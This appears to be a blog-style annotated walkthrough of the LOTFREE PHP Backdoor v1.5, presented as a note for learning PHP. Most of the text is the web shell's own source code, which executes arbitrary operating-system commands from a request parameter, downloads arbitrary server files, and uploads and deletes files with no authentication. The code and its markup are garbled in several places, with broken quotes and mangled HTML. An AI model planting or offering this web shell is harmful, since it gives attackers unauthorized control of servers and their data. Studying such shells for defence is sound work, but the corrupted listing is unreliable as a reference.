PHP Backdoor Version 1.5 is a PHP backdoor program written by sirius_black / LOTFREE TEAM. Here is a simple analysis of it, and it can also be used as a note for learning PHP. The execution of the backdoor program depends on the installation of the web server. With the user's permissions when using php, if you are an administrator, you can execute various operating system commands.
The following is a note on a backdoor
function good_link($link) { $link=ereg_replace (“/+”,”/”,$link); $link=ereg_replace(“/[^/(..)]+/..”,”/”,$link); $link= ereg_replace(“/+”,”/”,$link); if(!strncmp($link,”./”,2) && strlen($link)>2)$link=substr($link, 2);
if($link==”")$link=”.”;
return $link;
}
//$_REQUEST is used to obtain the data submitted to this file
$dir= isset($_REQUEST['dir'])?$_REQUEST['dir']:"."; //If dir is not defined, dir takes the default value "."
$dir=good_link($dir);
$rep=opendir($dir); //Open the path handle specified by dir
chdir($dir); //Switch to the directory specified by dir
if(isset($_REQUEST["down"]) &&$_REQUEST ["down"]!="") //If down is defined
{
header("Content-Type: application/octet-stream");
header("Content-Length: ".filesize($ _REQUEST["down"]));
header(“Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
readfile($_REQUEST["down"]); / /Read the file into the buffer
exit();
}
?>
LOTFREE PHP Backdoor v1.5, yeetrack. com echo "The current absolute path is: ".getcwd()."< /b>
echo "dir = '$dir'
echo "Current directory, File list!
//If you have entered the command to be executed
if(isset($_REQUEST['cmd']) &&$_REQUEST['cmd']!=” ")
{
echo "n";
system($_REQUEST['cmd']); //Execute the entered command on the server, and the execution result will be echoed
echo "n”;
}
//If the file has been uploaded
if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) // Get the posted file and save it to the current directory
{
if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"]) //Judge whether the file meets the size specification
{
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"]))) //Save the temporary file to the current directory
{
echo "File saved successfully".good_link("./".$_FILES["fic"]["name"])."!
}
else echo " File upload failed: ".$_FILES["fic"]["error"]."
}
else echo "File too large (file exceeds size limit)!
}
if(isset($_REQUEST['rm']) &&$_REQUEST['rm']!="") //If rm is defined, delete the specified file
{
if (unlink($_REQUEST['rm'])) //unlink is the file deletion function of php
echo "Successfully deleted ".$_REQUEST['rm']."!
else echo "Failed to delete file
}
?>
$t_dir=array(); $t_file=array(); $i_dir=0; $i_file=0; // Loop through the directory files before reading and place them in t_dir and t_file while($x=readdir($rep)) { if(is_dir($x)) //If the current processing is a directory $t_dir[$i_dir++]=$x; else //If the file is currently being processed $t_file[$i_file++]=$x; } closedir($rep); //Close by opendir Open directory handle while(1) //Loop through the directories and files in the current path { ?>
if($x=each($t_dir)) { $name =$x["value"]; //Get the directory name in the t_dir array if($name=='.'){} elseif($name=='..') echo " UP (parent directory)
else
echo " ".$name." n";
}
?>
//$_SERVER['PHP_SELF'] Get the current php script file name if($y =each($t_file)) { if($y["key"]%2==0) //If the current processing is key echo ” bgcolor='lightgreen'>n”;
else //If the current processing is value, that is, the file. The file will be displayed and a download link will be provided.
echo “>n”;
echo “ ".$y["value"]." n";
}
else echo ">n";
?>
if($y) { //If it is a file, provide the following link to delete the file if($y[" key"]%2==0)echo ” bgcolor='lightgreen'"; echo ">Del
}
else echo ">n";
?>
if(!$x && !$y) break; } ?>
< hr>
?dir=”>revenirau repertoire d'origine Execute commande(execute operating system command )
Upload files to Server current directory:
Copy code
